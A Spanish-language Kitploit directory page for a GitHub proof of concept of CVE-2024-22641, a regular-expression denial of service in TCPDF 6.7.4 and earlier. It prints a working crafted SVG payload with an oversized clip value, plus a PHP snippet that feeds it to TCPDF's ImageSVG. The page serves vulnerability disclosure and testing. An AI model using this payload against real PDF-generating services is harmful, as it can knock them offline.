Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-22641 — Prueba de concepto para CVE-2024-22641: vulnerabilidad ReDoS en TCPDF <=6.7.4 desencadenada por archivos SVG manipulados, que demuestra el agotamiento del límite de retroceso de expresiones regulares. | Kitploit
Herramientas/GitHubGitHub/zunak/cve-2024-22641
Análisis de VulnerabilidadesExplotaciónSeguridad WebFuzzingPapers e InvestigaciónAprendizaje y Educación
GitHubzunak/cve-2024-22641

CVE-2024-22641

Prueba de concepto para CVE-2024-22641: vulnerabilidad ReDoS en TCPDF <=6.7.4 desencadenada por archivos SVG manipulados, que demuestra el agotamiento del límite de retroceso de expresiones regulares.

Ver Repositorio
18hace 2 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2024-22641

Tipo de Vulnerabilidad

Denegación de Servicio por Expresión Regular (ReDoS)

Producto y Versión Afectados

TCPDF <= 6.7.4

Vector de Ataque

TCPDF analiza archivos SVG que contienen una carga útil maliciosa.

Descripción

La versión de TCPDF <= 6.7.4 es vulnerable a ReDoS (Denegación de Servicio por Expresión Regular) si analiza un archivo SVG no confiable.

PoC

<!--poc.svg-->
<svg
  version="1.1"
  xmlns="http://www.w3.org/2000/svg"
  xmlns:xlink="http://www.w3.org/1999/xlink">
  <circle clip="rect(0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000!)"/>
</svg>
<?php
require_once('../tcpdf.php');

// create new PDF document
$pdf = new TCPDF(PDF_PAGE_ORIENTATION, PDF_UNIT, PDF_PAGE_FORMAT, true, 'UTF-8', false);


// add a page
$pdf->AddPage();

$pdf->ImageSVG($file='poc.svg');
?>

Nota: Al verificar con preg_last_error() después de la línea vulnerable de código, la expresión regular saldrá con PREG_BACKTRACK_LIMIT_ERROR.

Descargar herramienta